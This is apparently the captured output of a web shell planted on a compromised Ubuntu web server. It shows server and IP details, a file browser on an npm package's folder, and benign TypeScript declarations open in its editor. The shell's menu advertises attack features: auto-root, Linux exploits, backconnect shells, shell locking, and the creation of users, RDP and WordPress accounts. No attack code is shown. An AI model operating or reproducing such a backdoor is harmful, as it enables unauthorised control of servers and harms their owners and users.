Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
input-otp /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.mts
1.46
KB
-rw-r--r--
index.d.ts
1.46
KB
-rw-r--r--
index.js
10.22
KB
-rw-r--r--
index.js.map
34.37
KB
-rw-r--r--
index.mjs
9.59
KB
-rw-r--r--
index.mjs.map
33.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
import * as React$1 from 'react'; interface SlotProps { isActive: boolean; char: string | null; placeholderChar: string | null; hasFakeCaret: boolean; } interface RenderProps { slots: SlotProps[]; isFocused: boolean; isHovering: boolean; } type OverrideProps<T, R> = Omit<T, keyof R> & R; type OTPInputBaseProps = OverrideProps<React.InputHTMLAttributes<HTMLInputElement>, { value?: string; onChange?: (newValue: string) => unknown; maxLength: number; textAlign?: 'left' | 'center' | 'right'; onComplete?: (...args: any[]) => unknown; pushPasswordManagerStrategy?: 'increase-width' | 'none'; pasteTransformer?: (pasted: string) => string; containerClassName?: string; noScriptCSSFallback?: string | null; }>; type InputOTPRenderFn = (props: RenderProps) => React.ReactNode; type OTPInputProps = OTPInputBaseProps & ({ render: InputOTPRenderFn; children?: never; } | { render?: never; children: React.ReactNode; }); declare const OTPInputContext: React$1.Context<RenderProps>; declare const OTPInput: React$1.ForwardRefExoticComponent<OTPInputProps & React$1.RefAttributes<HTMLInputElement>>; declare const REGEXP_ONLY_DIGITS = "^\\d+$"; declare const REGEXP_ONLY_CHARS = "^[a-zA-Z]+$"; declare const REGEXP_ONLY_DIGITS_AND_CHARS = "^[a-zA-Z0-9]+$"; export { OTPInput, OTPInputContext, type OTPInputProps, REGEXP_ONLY_CHARS, REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS, type RenderProps, type SlotProps };
Close